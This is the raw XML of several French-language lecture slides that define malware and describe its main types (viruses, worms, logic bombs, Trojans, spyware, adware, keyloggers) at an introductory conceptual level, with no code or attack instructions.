            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le programme est hostile ou intrusif </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le programme est conçu pour s'insérer dans votre ordinateur sans votre consentement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Programme utilisé ou créé pour perturber le fonctionnement de l'ordinateur, recueillir des informations sensibles ou accéder à des systèmes informatiques privés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>« Malware »</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> est un terme général utilisé pour désigner une variété de formes de logiciels hostiles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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30</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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1919" y="30616"/>
            <a:ext cx="1587425" cy="952455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13059364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types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="11673840" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il existe de nombreuses façons de catégoriser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Ils peuvent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>être </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>classés principalement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>en fonction des trois mécanismes suivants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>mécanisme de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>propagation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>la façon dont les logiciels malveillants se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>propagent : réseau, email, site web …</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>mécanisme de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>déclenchement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>déclenche </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>lorsqu'un évènement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>survient : une date, une exécution … </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>charge utile </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>les actions entreprises par les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares après </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>avoir infecté avec succès la machine des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>victimes</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31</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12496117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types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="11673840" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un virus est une portion de programme qui se reproduit en se copiant dans le code d’autres programmes ordinaires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un programme qui contient un virus est un programme infecté</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Lorsque le programme infecté est exécuté, le virus est exécuté</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Plusieurs types de virus :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Virus de secteur d'amorçage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Virus de fichier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Virus de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>macro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Virus Polymorphe</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36434795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types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="10049256" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vers (Worms)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un ver informatique est un programme malveillant qui propage des copies de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>lui-même (autonome) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>sans qu'il soit nécessaire de s'injecter dans d'autres programmes, et généralement sans interaction humaine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Contrairement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>aux virus, un ver n’a pas besoin d’un logiciel hôte pour se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>dupliquer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>De </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>nombreux vers sont conçus uniquement pour se propager et ne tentent pas de modifier les systèmes qu'ils traversent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le ver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>peut avoir aussi un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>objectif malicieux, par exemple : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Envoyer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de multiples requêtes vers un serveur internet dans le but de le saturer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Espionner l’ordinateur dans lequel il réside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Offrir une porté dérobée à des pirates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>informatiques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Détruire des données sur l’ordinateur infecté</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4944774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types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="10049256" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bombe logique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les bombes logiques sont un type de logiciel malveillant délibérément installé, généralement par un utilisateur autorisé.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une bombe logique est un morceau de code qui reste inactif pendant un certain temps jusqu'à ce qu'un événement invoque sa charge utile malveillante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les bombes logiques sont difficiles à détecter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ils démontrent la nécessité d'une séparation des tâches et d'un examen périodique de tous les programmes et services exécutés sur un système.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Ils renforcent le besoin de sauvegardes actives.</a:t>
            </a:r>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1574500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types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="7269480" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cheval de Troie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un logiciel en apparence légitime, mais qui contient une fonctionnalité malveillante</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un cheval de Troie est un programme autonome qui doit être copié et installé par l'utilisateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Contrairement aux virus et vers informatiques, les chevaux de Troie ne sont pas capables de se répliquer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>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35</a:t>
            </a:fld>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680" y="805752"/>
            <a:ext cx="3800144" cy="1722663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1783520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types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="9805416" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spyware (logiciel espion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une application installée involontairement sur un ordinateur pour surveiller l'activité des utilisateurs et transmettre les informations à un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>tiers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les logiciels </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>espions peuvent effectuer un large éventail d'activités</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>peut enregistrer les frappes au clavier (communément appelé </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Il peut envoyer des captures d’écrans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>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36</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2913404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types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="9805416" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les logiciels publicitaires sont conçus pour diffuser des publicités sur les écrans d'un navigateur Web. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>est généralement installé discrètement en arrière-plan lors du téléchargement d'un programme à votre insu ou sans votre permission. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Bien </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>qu'inoffensifs, les logiciels publicitaires peuvent être gênants pour l'utilisateur.</a:t>
            </a:r>
          </a:p>
          <a:p>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37</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14202462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types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="9805416" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enregistreur de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frappe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>enregistreur de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>frappe, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>enregistre chaque frappe effectuée sur un ordinateur, souvent sans l'autorisation ou la connaissance de l'utilisateur. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>enregistreurs de frappe ont des utilisations légitimes en tant qu'outil de surveillance informatique professionnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cependant, l'enregistrement des frappes est couramment utilisé à des fins criminelles, capturant des informations sensibles telles que les noms d'utilisateur, les mots de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>passe …</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38</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39397608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types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>malwares</a:t>
            </a:r>
